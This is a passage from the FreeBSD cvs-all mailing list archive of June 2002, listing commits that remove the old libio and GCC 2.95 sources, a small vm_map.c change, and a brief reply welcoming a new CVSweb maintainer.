ChangeLog Makefile.in clearerr.c clearerr_u.c configure.in fdopen.c feof.c feof_u.c ferror.c ferror_u.c fgetc.c fileno.c fputc.c fputc_u.c freopen.c fseek.c getc.c getc_u.c getchar.c getchar_u.c getline.c getw.c obprintf.c popen.c putc.c putc_u.c putchar.c putchar_u.c putw.c rewind.c setbuf.c setfileno.c setlinebuf.c snprintf.c stdio.h vasprintf.c vfprintf.c vfscanf.c vprintf.c vscanf.c vsnprintf.c contrib/libio/tests ChangeLog Makefile.in configure.in hounddog.cc hounddog.exp hounddog.inp putbackdog.cc tFile.cc tFile.exp tFile.inp tfformat.c tiformat.c tiomanip.cc tiomanip.exp tiomisc.cc tiomisc.exp tstdiomisc.c tstdiomisc.exp contrib/libio/testsuite ChangeLog Makefile.in configure.in contrib/libio/testsuite/config default.exp contrib/libio/testsuite/lib libio.exp contrib/libio/testsuite/libio.tests hounddog.exp putbackdog.exp tFile.exp tfformat.exp tiformat.exp tiomanip.exp tiomisc.exp tstdiomisc.exp Log: FreeBSD is one of the OS's that does not require the use of libio with Gcc 3.1. Revision Changes Path 1.2 +0 -2629 src/contrib/libio/ChangeLog (dead) 1.3 +0 -21 src/contrib/libio/FREEBSD-upgrade (dead) 1.2 +0 -132 src/contrib/libio/Makefile.in (dead) 1.2 +0 -57 src/contrib/libio/NEWS (dead) 1.2 +0 -157 src/contrib/libio/PlotFile.cc (dead) 1.2 +0 -89 src/contrib/libio/PlotFile.h (dead) 1.2 +0 -30 src/contrib/libio/README (dead) 1.2 +0 -82 src/contrib/libio/SFile.cc (dead) 1.2 +0 -55 src/contrib/libio/SFile.h (dead) 1.2 +0 -78 src/contrib/libio/builtinbuf.cc (dead) 1.2 +0 -68 src/contrib/libio/builtinbuf.h (dead) 1.2 +0 -17 src/contrib/libio/cleanup.c (dead) 1.2 +0 -496 src/contrib/libio/config.shared (dead) 1.2 +0 -3 src/contrib/libio/config/hpux.mt (dead) 1.2 +0 -4 src/contrib/libio/config/isc.mt (dead) 1.2 +0 -25 src/contrib/libio/config/linux.mt (dead) 1.2 +0 -112 src/contrib/libio/config/linuxaxp1-libc-lock.h (dead) 1.2 +0 -36 src/contrib/libio/config/linuxaxp1-stdio-lock.h (dead) 1.2 +0 -10 src/contrib/libio/config/linuxaxp1.mt (dead) 1.2 +0 -26 src/contrib/libio/config/linuxlibc1.mt (dead) 1.2 +0 -3 src/contrib/libio/config/mn10200.mt (dead) 1.2 +0 -2 src/contrib/libio/config/mtsafe.mt (dead) 1.2 +0 -16 src/contrib/libio/config/netware.mt (dead) 1.2 +0 -154 src/contrib/libio/configure.in (dead) 1.2 +0 -218 src/contrib/libio/dbz/Makefile.in (dead) 1.2 +0 -25 src/contrib/libio/dbz/README (dead) 1.2 +0 -7 src/contrib/libio/dbz/altbytes (dead) 1.2 +0 -38 src/contrib/libio/dbz/byteflip.c (dead) 1.2 +0 -129 src/contrib/libio/dbz/case.c (dead) 1.2 +0 -12 src/contrib/libio/dbz/case.h (dead) 1.2 +0 -17 src/contrib/libio/dbz/configure.in (dead) 1.2 +0 -221 src/contrib/libio/dbz/dbz.1 (dead) 1.2 +0 -547 src/contrib/libio/dbz/dbz.3z (dead) 1.2 +0 -1768 src/contrib/libio/dbz/dbz.c (dead) 1.2 +0 -32 src/contrib/libio/dbz/dbz.h (dead) 1.2 +0 -519 src/contrib/libio/dbz/dbzmain.c (dead) 1.2 +0 -144 src/contrib/libio/dbz/fake.c (dead) 1.2 +0 -50 src/contrib/libio/dbz/firstlast25 (dead) 1.2 +0 -6 src/contrib/libio/dbz/getmap (dead) 1.2 +0 -31 src/contrib/libio/dbz/random.c (dead) 1.2 +0 -7 src/contrib/libio/dbz/revbytes (dead) 1.2 +0 -1 src/contrib/libio/dbz/stdio.h (dead) 1.2 +0 -352 src/contrib/libio/depend (dead) 1.2 +0 -717 src/contrib/libio/editbuf.cc (dead) 1.2 +0 -185 src/contrib/libio/editbuf.h (dead) 1.2 +0 -215 src/contrib/libio/filebuf.cc (dead) 1.2 +0 -110 src/contrib/libio/filedoalloc.c (dead) 1.2 +0 -814 src/contrib/libio/fileops.c (dead) 1.2 +0 -2375 src/contrib/libio/floatconv.c (dead) 1.2 +0 -51 src/contrib/libio/floatio.h (dead) 1.2 +0 -110 src/contrib/libio/fstream.cc (dead) 1.2 +0 -92 src/contrib/libio/fstream.h (dead) 1.2 +0 -734 src/contrib/libio/gen-params (dead) 1.2 +0 -946 src/contrib/libio/genops.c (dead) 1.2 +0 -37 src/contrib/libio/include/empty.h (dead) 1.2 +0 -121 src/contrib/libio/indstream.cc (dead) 1.2 +0 -77 src/contrib/libio/indstream.h (dead) 1.2 +0 -49 src/contrib/libio/ioassign.cc (dead) 1.2 +0 -132 src/contrib/libio/ioextend.cc (dead) 1.2 +0 -60 src/contrib/libio/iofclose.c (dead) 1.2 +0 -134 src/contrib/libio/iofdopen.c (dead) 1.2 +0 -45 src/contrib/libio/iofeof.c (dead) 1.2 +0 -45 src/contrib/libio/ioferror.c (dead) 1.2 +0 -49 src/contrib/libio/iofflush.c (dead) 1.2 +0 -40 src/contrib/libio/iofflush_u.c (dead) 1.2 +0 -55 src/contrib/libio/iofgetpos.c (dead) 1.2 +0 -56 src/contrib/libio/iofgets.c (dead) 1.2 +0 -64 src/contrib/libio/iofopen.c (dead) 1.2 +0 -51 src/contrib/libio/iofprintf.c (dead) 1.2 +0 -49 src/contrib/libio/iofputs.c (dead) 1.2 +0 -49 src/contrib/libio/iofread.c (dead) 1.2 +0 -48 src/contrib/libio/iofscanf.c (dead) 1.2 +0 -56 src/contrib/libio/iofsetpos.c (dead) 1.2 +0 -53 src/contrib/libio/ioftell.c (dead) 1.2 +0 -54 src/contrib/libio/iofwrite.c (dead) 1.2 +0 -50 src/contrib/libio/iogetc.c (dead) 1.2 +0 -125 src/contrib/libio/iogetdelim.c (dead) 1.2 +0 -112 src/contrib/libio/iogetline.c (dead) 1.2 +0 -71 src/contrib/libio/iogets.c (dead) 1.2 +0 -47 src/contrib/libio/ioignore.c (dead) 1.2 +0 -63 src/contrib/libio/iolibio.h (dead) 1.2 +0 -90 src/contrib/libio/iomanip.cc (dead) 1.2 +0 -176 src/contrib/libio/iomanip.h (dead) 1.2 +0 -70 src/contrib/libio/iopadn.c (dead) 1.2 +0 -22 src/contrib/libio/ioperror.c (dead) 1.2 +0 -251 src/contrib/libio/iopopen.c (dead) 1.2 +0 -80 src/contrib/libio/ioprims.c (dead) 1.2 +0 -47 src/contrib/libio/ioprintf.c (dead) 1.2 +0 -44 src/contrib/libio/ioputc.c (dead) 1.2 +0 -49 src/contrib/libio/ioputs.c (dead) 1.2 +0 -47 src/contrib/libio/ioscanf.c (dead) 1.2 +0 -54 src/contrib/libio/ioseekoff.c (dead) 1.2 +0 -48 src/contrib/libio/ioseekpos.c (dead) 1.2 +0 -46 src/contrib/libio/iosetbuffer.c (dead) 1.2 +0 -100 src/contrib/libio/iosetvbuf.c (dead) 1.2 +0 -50 src/contrib/libio/iosprintf.c (dead) 1.2 +0 -47 src/contrib/libio/iosscanf.c (dead) 1.2 +0 -114 src/contrib/libio/iostdio.h (dead) 1.2 +0 -990 src/contrib/libio/iostream.cc (dead) 1.2 +0 -272 src/contrib/libio/iostream.h (dead) 1.2 +0 -1971 src/contrib/libio/iostream.texi (dead) 1.2 +0 -26 src/contrib/libio/iostreamP.h (dead) 1.2 +0 -12 src/contrib/libio/iostrerror.c (dead) 1.2 +0 -46 src/contrib/libio/ioungetc.c (dead) 1.2 +0 -890 src/contrib/libio/iovfprintf.c (dead) 1.2 +0 -790 src/contrib/libio/iovfscanf.c (dead) 1.2 +0 -60 src/contrib/libio/iovsprintf.c (dead) 1.2 +0 -59 src/contrib/libio/iovsscanf.c (dead) 1.2 +0 -141 src/contrib/libio/isgetline.cc (dead) 1.2 +0 -59 src/contrib/libio/isgetsb.cc (dead) 1.2 +0 -45 src/contrib/libio/isscan.cc (dead) 1.2 +0 -25 src/contrib/libio/istream.h (dead) 1.2 +0 -364 src/contrib/libio/libio.h (dead) 1.2 +0 -641 src/contrib/libio/libioP.h (dead) 1.2 +0 -66 src/contrib/libio/osform.cc (dead) 1.2 +0 -25 src/contrib/libio/ostream.h (dead) 1.2 +0 -211 src/contrib/libio/outfloat.c (dead) 1.2 +0 -317 src/contrib/libio/parsestream.cc (dead) 1.2 +0 -156 src/contrib/libio/parsestream.h (dead) 1.2 +0 -42 src/contrib/libio/peekc.c (dead) 1.2 +0 -92 src/contrib/libio/pfstream.cc (dead) 1.2 +0 -59 src/contrib/libio/pfstream.h (dead) 1.2 +0 -55 src/contrib/libio/procbuf.cc (dead) 1.2 +0 -50 src/contrib/libio/procbuf.h (dead) 1.2 +0 -40 src/contrib/libio/sbform.cc (dead) 1.2 +0 -31 src/contrib/libio/sbgetline.cc (dead) 1.2 +0 -45 src/contrib/libio/sbscan.cc (dead) 1.2 +0 -51 src/contrib/libio/stdfiles.c (dead) 1.2 +0 -137 src/contrib/libio/stdio/ChangeLog (dead) 1.2 +0 -35 src/contrib/libio/stdio/Makefile.in (dead) 1.2 +0 -30 src/contrib/libio/stdio/clearerr.c (dead) 1.2 +0 -28 src/contrib/libio/stdio/clearerr_u.c (dead) 1.2 +0 -49 src/contrib/libio/stdio/configure.in (dead) 1.2 +0 -9 src/contrib/libio/stdio/fdopen.c (dead) 1.2 +0 -43 src/contrib/libio/stdio/feof.c (dead) 1.2 +0 -37 src/contrib/libio/stdio/feof_u.c (dead) 1.2 +0 -43 src/contrib/libio/stdio/ferror.c (dead) 1.2 +0 -37 src/contrib/libio/stdio/ferror_u.c (dead) 1.2 +0 -40 src/contrib/libio/stdio/fgetc.c (dead) 1.2 +0 -49 src/contrib/libio/stdio/fileno.c (dead) 1.2 +0 -41 src/contrib/libio/stdio/fputc.c (dead) 1.2 +0 -38 src/contrib/libio/stdio/fputc_u.c (dead) 1.2 +0 -44 src/contrib/libio/stdio/freopen.c (dead) 1.2 +0 -42 src/contrib/libio/stdio/fseek.c (dead) 1.2 +0 -48 src/contrib/libio/stdio/getc.c (dead) 1.2 +0 -37 src/contrib/libio/stdio/getc_u.c (dead) 1.2 +0 -40 src/contrib/libio/stdio/getchar.c (dead) 1.2 +0 -35 src/contrib/libio/stdio/getchar_u.c (dead) 1.2 +0 -13 src/contrib/libio/stdio/getline.c (dead) 1.2 +0 -13 src/contrib/libio/stdio/getw.c (dead) 1.2 +0 -168 src/contrib/libio/stdio/obprintf.c (dead) 1.2 +0 -23 src/contrib/libio/stdio/popen.c (dead) 1.2 +0 -42 src/contrib/libio/stdio/putc.c (dead) 1.2 +0 -31 src/contrib/libio/stdio/putc_u.c (dead) 1.2 +0 -35 src/contrib/libio/stdio/putchar.c (dead) 1.2 +0 -30 src/contrib/libio/stdio/putchar_u.c (dead) 1.2 +0 -15 src/contrib/libio/stdio/putw.c (dead) 1.2 +0 -38 src/contrib/libio/stdio/rewind.c (dead) 1.2 +0 -35 src/contrib/libio/stdio/setbuf.c (dead) 1.2 +0 -17 src/contrib/libio/stdio/setfileno.c (dead) 1.2 +0 -36 src/contrib/libio/stdio/setlinebuf.c (dead) 1.2 +0 -51 src/contrib/libio/stdio/snprintf.c (dead) 1.2 +0 -219 src/contrib/libio/stdio/stdio.h (dead) 1.2 +0 -72 src/contrib/libio/stdio/vasprintf.c (dead) 1.2 +0 -35 src/contrib/libio/stdio/vfprintf.c (dead) 1.2 +0 -36 src/contrib/libio/stdio/vfscanf.c (dead) 1.2 +0 -33 src/contrib/libio/stdio/vprintf.c (dead) 1.2 +0 -41 src/contrib/libio/stdio/vscanf.c (dead) 1.2 +0 -136 src/contrib/libio/stdio/vsnprintf.c (dead) 1.2 +0 -159 src/contrib/libio/stdiostream.cc (dead) 1.2 +0 -79 src/contrib/libio/stdiostream.h (dead) 1.2 +0 -126 src/contrib/libio/stdstrbufs.cc (dead) 1.2 +0 -153 src/contrib/libio/stdstreams.cc (dead) 1.2 +0 -170 src/contrib/libio/stream.cc (dead) 1.2 +0 -59 src/contrib/libio/stream.h (dead) 1.2 +0 -364 src/contrib/libio/streambuf.cc (dead) 1.2 +0 -488 src/contrib/libio/streambuf.h (dead) 1.2 +0 -71 src/contrib/libio/strfile.h (dead) 1.2 +0 -303 src/contrib/libio/strops.c (dead) 1.2 +0 -116 src/contrib/libio/strstream.cc (dead) 1.2 +0 -113 src/contrib/libio/strstream.h (dead) 1.2 +0 -150 src/contrib/libio/tests/ChangeLog (dead) 1.2 +0 -195 src/contrib/libio/tests/Makefile.in (dead) 1.2 +0 -36 src/contrib/libio/tests/configure.in (dead) 1.2 +0 -85 src/contrib/libio/tests/hounddog.cc (dead) 1.2 +0 -7 src/contrib/libio/tests/hounddog.exp (dead) 1.2 +0 -7 src/contrib/libio/tests/hounddog.inp (dead) 1.2 +0 -97 src/contrib/libio/tests/putbackdog.cc (dead) 1.2 +0 -558 src/contrib/libio/tests/tFile.cc (dead) 1.2 +0 -75 src/contrib/libio/tests/tFile.exp (dead) 1.2 +0 -5 src/contrib/libio/tests/tFile.inp (dead) 1.2 +0 -4181 src/contrib/libio/tests/tfformat.c (dead) 1.2 +0 -5112 src/contrib/libio/tests/tiformat.c (dead) 1.2 +0 -35 src/contrib/libio/tests/tiomanip.cc (dead) 1.2 +0 -4 src/contrib/libio/tests/tiomanip.exp (dead) 1.2 +0 -236 src/contrib/libio/tests/tiomisc.cc (dead) 1.2 +0 -11 src/contrib/libio/tests/tiomisc.exp (dead) 1.2 +0 -43 src/contrib/libio/tests/tstdiomisc.c (dead) 1.2 +0 -8 src/contrib/libio/tests/tstdiomisc.exp (dead) 1.2 +0 -74 src/contrib/libio/testsuite/ChangeLog (dead) 1.2 +0 -89 src/contrib/libio/testsuite/Makefile.in (dead) 1.2 +0 -1 src/contrib/libio/testsuite/config/default.exp (dead) 1.2 +0 -22 src/contrib/libio/testsuite/configure.in (dead) 1.2 +0 -167 src/contrib/libio/testsuite/lib/libio.exp (dead) 1.2 +0 -3 src/contrib/libio/testsuite/libio.tests/hounddog.exp (dead) 1.2 +0 -3 src/contrib/libio/testsuite/libio.tests/putbackdog.exp (dead) 1.2 +0 -3 src/contrib/libio/testsuite/libio.tests/tFile.exp (dead) 1.2 +0 -1 src/contrib/libio/testsuite/libio.tests/tfformat.exp (dead) 1.2 +0 -1 src/contrib/libio/testsuite/libio.tests/tiformat.exp (dead) 1.2 +0 -1 src/contrib/libio/testsuite/libio.tests/tiomanip.exp (dead) 1.2 +0 -1 src/contrib/libio/testsuite/libio.tests/tiomisc.exp (dead) 1.2 +0 -1 src/contrib/libio/testsuite/libio.tests/tstdiomisc.exp (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:28: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from tao.org.uk (genius.tao.org.uk [212.135.162.51]) by hub.freebsd.org (Postfix) with ESMTP id 00C7237B404; Tue, 18 Jun 2002 11:27:58 -0700 (PDT) Received: by tao.org.uk (Postfix, from userid 100) id C9CF73BE; Tue, 18 Jun 2002 19:27:39 +0100 (BST) Date: Tue, 18 Jun 2002 19:27:39 +0100 From: Josef Karthauser To: Akinori MUSHA Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT access Message-ID: <20020618182739.GB97063@genius.tao.org.uk> References: <200206180939.g5I9ddE76304@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="7ZAtKRhVyVSsbBD2" Content-Disposition: inline In-Reply-To: <200206180939.g5I9ddE76304@freefall.freebsd.org> User-Agent: Mutt/1.3.99i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --7ZAtKRhVyVSsbBD2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 18, 2002 at 02:39:39AM -0700, Akinori MUSHA wrote: > knu 2002/06/18 02:39:39 PDT >=20 > Modified files: > . access=20 > Log: > I am glad to announce that we finally got a new CVSweb maintainer. > Please welcome Ville Skytt=1B,Ad=1B(B (scop), who bravely stepped forwa= rd to > work on improving FreeBSD CVSweb. > =20 > Commit bit type: projects/cvsweb > Approved by: core > Mentored by: knu Horray :) Joe --7ZAtKRhVyVSsbBD2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iEYEARECAAYFAj0Pe5sACgkQXVIcjOaxUBboVQCgwM5RdeCvVbS73xnFB1YPm91I P/wAoJIjH1bsP3zHW21lYo1yJTkVThWb =Q/l0 -----END PGP SIGNATURE----- --7ZAtKRhVyVSsbBD2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:31:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EA66A37B407; Tue, 18 Jun 2002 11:31:35 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IIVZu73580; Tue, 18 Jun 2002 11:31:35 -0700 (PDT) (envelope-from alc) Message-Id: <200206181831.g5IIVZu73580@freefall.freebsd.org> From: Alan Cox Date: Tue, 18 Jun 2002 11:31:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_map.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/18 11:31:35 PDT Modified files: sys/vm vm_map.c Log: o Remove LK_CANRECURSE from the vm_map lock. Revision Changes Path 1.254 +2 -2 src/sys/vm/vm_map.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:36:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 15A3C37B404; Tue, 18 Jun 2002 11:33:53 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IIXqr75460; Tue, 18 Jun 2002 11:33:52 -0700 (PDT) (envelope-from obrien) Message-Id: <200206181833.g5IIXqr75460@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 11:33:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 11:33:50 PDT Removed files: contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-fixinc README.DWARF README.TRAD README.g77 SERVICE TESTS.FLUNK acconfig.h aclocal.m4 alias.c ansidecl.h assert.h basic-block.h bitmap.c bitmap.h build-make c-aux-info.c c-common.c c-convert.c c-decl.c c-iterate.c c-lang.c c-lex.c c-lex.h c-parse.gperf c-parse.in c-pragma.c c-pragma.h c-tree.h c-typeck.c caller-save.c calls.c cccp.1 cccp.c cexp.y choose-temp.c collect2.c collect2.h combine.c conditions.h config.guess config.in config.sub configure configure.frag configure.in configure.lang convert.c convert.h cplus-dem.c cpp.1 cpp.in cpp.texi cppalloc.c cpperror.c cppexp.c cppfiles.c cpphash.c cpphash.h cppinit.c cpplib.c cpplib.h cppmain.c cppspec.c cppulp.c cross-make crtstuff.c cse.c cstamp-h.in dbxout.c dbxout.h dbxstclass.h defaults.h demangle.h doprint.c doschk.c dostage2 dostage3 dwarf.h dwarf2.h dwarf2out.c dwarf2out.h dwarfout.c dwarfout.h dyn-string.c dyn-string.h eh-common.h emit-rtl.c enquire.c except.c except.h exgettext explow.c expmed.c expr.c expr.h extend.texi final.c fix-header.c fixcpp fixinc-nt.sed fixincludes fixproto flags.h floatlib.c flow.c fold-const.c fp-test.c frame.c frame.h function.c function.h future.options gansidecl.h gbl-ctors.h gcc.1 gcc.c gcc.texi gccspec.c gcov-io.h gcov.c gcov.texi gcse.c gen-protos.c genattr.c genattrtab.c gencheck.c gencodes.c genconfig.c genemit.c genextract.c genflags.c gengenrtl.c genmultilib genopinit.c genoutput.c genpeep.c genrecog.c getopt.c getopt.h getopt1.c getpwd.c glimits.h global.c gmon.c graph.c gstab.h gsyms.h gsyslimits.h gthr-dce.h gthr-posix.h gthr-single.h gthr-solaris.h gthr-vxworks.h gthr.h haifa-sched.c halfpic.c halfpic.h hard-reg-set.h hash.c hash.h hwint.h input.h install.texi integrate.c integrate.h intl.c intl.h invoke.texi jump.c just-fixinc lcm.c libgcc1-test.c libgcc1.c libgcc2.c libiberty.h limitx.h limity.h listing local-alloc.c longlong.h loop.c loop.h machmode.def machmode.h makefile.vms mbchar.c mbchar.h md.texi mips-tdump.c mips-tfile.c move-if-change obstack.c obstack.h optabs.c output.h patch-apollo-includes pcp.h pexecute.c prefix.c prefix.h print-rtl.c print-tree.c profile.c protoize.c pself.c pself1.c pself2.c pself3.c pself4.c pself5.c real.c real.h recog.c recog.h reg-stack.c regclass.c regmove.c regs.h reload.c reload.h reload1.c reorg.c resource.c resource.h rtl.c rtl.def rtl.h rtl.texi rtlanal.c sbitmap.c sbitmap.h scan-decls.c scan-types.sh scan.c scan.h sched.c sdbout.c sdbout.h sort-protos splay-tree.c splay-tree.h stab.def stack.h stmt.c stor-layout.c stupid.c sys-protos.h sys-types.h system.h tlink.c tm.texi toplev.c toplev.h tree.c tree.def tree.h typeclass.h unprotoize.c unroll.c varasm.c varray.c varray.h version.c xcoffout.c xcoffout.h contrib/gcc.295/config README aoutos.h dbx.h dbxcoff.h dbxelf.h elfos.h float-i128.h float-i32.h float-i386.h float-i64.h float-m68k.h float-sh.h float-vax.h fp-bit.c freebsd.h gnu.h gofast.h interix.h libgloss.h linux-aout.h linux.h lynx-ng.h lynx.h netbsd.h nextstep.c nextstep.h nextstep21.h openbsd.h psos.h ptx4.h svr3.h svr4.h t-freebsd t-gnu t-install-cpp t-libc-ok t-linux t-linux-aout t-linux-gnulibc1 t-netbsd t-openbsd t-openbsd-thread t-rtems t-svr4 tm-dwarf2.h x-interix x-linux x-linux-aout x-lynx x-svr4 xm-alloca.h xm-freebsd.h xm-gnu.h xm-interix.h xm-linux.h xm-lynx.h xm-openbsd.h xm-siglist.h xm-std32.h xm-svr3.h xm-svr4.h contrib/gcc.295/config/alpha alpha-interix.h alpha.c alpha.h alpha.md alpha32.h config-nt.sed crtbegin.asm crtend.asm elf.h freebsd.h lib1funcs.asm linux-ecoff.h linux-elf.h linux.h netbsd-elf.h netbsd.h openbsd.h osf.h osf12.h osf2or3.h t-crtbe t-ieee t-interix t-vms va_list.h vms-tramp.asm vms.h vxworks.h win-nt.h x-alpha xm-alpha-interix.h xm-alpha.h xm-freebsd.h xm-openbsd.h xm-vms.h xm-winnt.h contrib/gcc.295/config/i386 386bsd.h aix386.h aix386ng.h att.h bsd.h bsd386.h config-nt.sed crtdll.h cygwin.asm cygwin.h dgux.c dgux.h djgpp-rtems.h djgpp.h freebsd-aout.h freebsd.h freebsd.h.fixed gas.h gmon-sol2.c gnu.h gstabs.h i386-aout.h i386-coff.h i386-interix.h i386.c i386.h i386.md interix.c isc.h isccoff.h iscdbx.h linux-aout.h linux-oldld.h linux.h lynx-ng.h lynx.h mach.h mingw32.h moss.h netbsd.h next.h openbsd.h os2.h osf1-ci.asm osf1-cn.asm osf1elf.h osf1elfgdb.h osfelf.h osfrose.h perform.h ptx4-i.h rtems.h rtemself.h sco.h sco4.h sco4dbx.h sco5.h sco5gas.h scodbx.h seq-gas.h seq-sysv3.h seq2-sysv3.h sequent.h sol2-c1.asm sol2-ci.asm sol2-cn.asm sol2-gc1.asm sol2.h sol2gas.h sun.h sun386.h svr3.ifile svr3dbx.h svr3gas.h svr3z.ifile sysv3.h sysv4.h sysv5.h t-crtpic t-crtstuff t-cygwin t-dgux t-djgpp t-i386bare t-interix t-mingw32 t-next t-osf t-osf1elf t-sco5 t-sco5gas t-sol2 t-svr3dbx t-udk t-uwin t-vsta t-winnt udk.h unix.h uwin.asm uwin.h v3gas.h vsta.h vxi386.h win-nt.h win32.h winnt.c x-aix x-cygwin x-dgux x-djgpp x-isc x-isc3 x-ncr3000 x-next x-osf1elf x-osfrose x-sco x-sco4 x-sco5 x-sysv3 x-vsta xm-aix.h xm-bsd386.h xm-cygwin.h xm-dgux.h xm-djgpp.h xm-dos.h xm-freebsd.h xm-gnu.h xm-i386-interix.h xm-i386.h xm-isc.h xm-linux.h xm-lynx.h xm-mingw32.h xm-next.h xm-openbsd.h xm-os2.h xm-osf.h xm-osf1elf.h xm-sco.h xm-sco5.h xm-sun.h xm-sysv3.h xm-sysv4.h xm-uwin.h xm-vsta.h xm-winnt.h contrib/gcc.295/config/sparc aout.h bsd.h elf.h gmon-sol2.c hal.h lb1spc.asm lb1spl.asm linux-aout.h linux.h linux64.h lite.h litecoff.h lynx-ng.h lynx.h netbsd.h openbsd.h pbd.h rtems.h sol2-c1.asm sol2-ci.asm sol2-cn.asm sol2-g1.asm sol2-sld-64.h sol2-sld.h sol2.h sp64-aout.h sp64-elf.h sparc.c sparc.h sparc.md splet.h sun4gas.h sun4o3.h sunos4.h sysv4.h t-elf t-halos t-linux64 t-sol2 t-sol2-64 t-sp64 t-sparcbare t-sparclite t-splet t-sunos40 t-sunos41 t-vxsparc vxsim.h vxsparc.h x-sysv4 xm-linux.h xm-lynx.h xm-openbsd.h xm-pbd.h xm-sol2.h xm-sp64.h xm-sparc.h xm-sysv4-64.h xm-sysv4.h contrib/gcc.295/cp ChangeLog Make-lang.in Makefile.in NEWS call.c class.c config-lang.in cp-tree.def cp-tree.h cvt.c decl.c decl.h decl2.c errfn.c error.c except.c exception.cc expr.c friend.c g++.1 g++spec.c gxx.gperf gxxint.texi init.c input.c lang-options.h lang-specs.h lex.c lex.h method.c mpw-config.in mpw-make.sed new.cc new1.cc new2.cc parse.y pt.c ptree.c repo.c rtti.c search.c semantics.c sig.c spew.c tinfo.cc tinfo.h tinfo2.cc tree.c typeck.c typeck2.c xref.c contrib/gcc.295/cp/inc exception new new.h typeinfo contrib/gcc.295/f BUGS ChangeLog INSTALL Make-lang.in Makefile.in NEWS README RELEASE-PREP ansify.c assert.j bad.c bad.def bad.h bit.c bit.h bld-op.def bld.c bld.h bugs.texi bugs0.texi com-rt.def com.c com.h config-lang.in config.j convert.j data.c data.h equiv.c equiv.h expr.c expr.h ffe.texi fini.c flags.j g77.1 g77.texi g77install.texi g77spec.c glimits.j global.c global.h hconfig.j implic.c implic.h info-b.def info-k.def info-w.def info.c info.h input.j intdoc.c intdoc.in intdoc.texi intrin.c intrin.def intrin.h lab.c lab.h lang-options.h lang-specs.h lex.c lex.h malloc.c malloc.h name.c name.h news.texi news0.texi output.j parse.c proj.c proj.h root.texi rtl.j src.c src.h st.c st.h sta.c sta.h stb.c stb.h stc.c stc.h std.c std.h ste.c ste.h storag.c storag.h stp.c stp.h str-1t.fin str-2t.fin str-fo.fin str-io.fin str-nq.fin str-op.fin str-ot.fin str.c str.h sts.c sts.h stt.c stt.h stu.c stu.h stv.c stv.h stw.c stw.h symbol.c symbol.def symbol.h system.j target.c target.h tconfig.j tm.j top.c top.h toplev.j tree.j type.c type.h version.c version.h where.c where.h contrib/gcc.295/ginclude iso646.h math-3300.h math-68881.h ppc-asm.h proto.h stdarg.h stdbool.h stddef.h va-alpha.h va-arc.h va-c4x.h va-clipper.h va-h8300.h va-i860.h va-i960.h va-m32r.h va-m88k.h va-mips.h va-mn10200.h va-mn10300.h va-pa.h va-ppc.h va-pyr.h va-sh.h va-sparc.h va-spur.h va-v850.h varargs.h contrib/gcc.295/objc Make-lang.in Makefile.in README config-lang.in lang-specs.h objc-act.c objc-act.h objc-tree.def objc.gperf Log: _ /) mo / ) |/)\) /\_ \__|= ( ) __)(__ _____/ \\_____ | || | GCC 2.95 || | || |Notorious compiler|| | pardoned and || | forgiven... || | May It || | _ ___ _ || | | \ | | \ || | | | | | | || | |_/ | |_/ || | | \ | | || | | \ | | || | | \. _|_. | . || | || * | * ** * ** |** ** \))ejm97/.,(//,,..,,\||(,,.,\\,.((// Revision Changes Path 1.2 +0 -23 src/contrib/gcc.295/BUGS (dead) 1.2 +0 -339 src/contrib/gcc.295/COPYING (dead) 1.2 +0 -482 src/contrib/gcc.295/COPYING.LIB (dead) 1.2 +0 -5684 src/contrib/gcc.295/ChangeLog (dead) 1.3 +0 -91 src/contrib/gcc.295/FREEBSD-Xlist (dead) 1.2 +0 -2154 src/contrib/gcc.295/FSFChangeLog (dead) 1.2 +0 -1906 src/contrib/gcc.295/INSTALL (dead) 1.2 +0 -79 src/contrib/gcc.295/LANGUAGES (dead) 1.7 +0 -3201 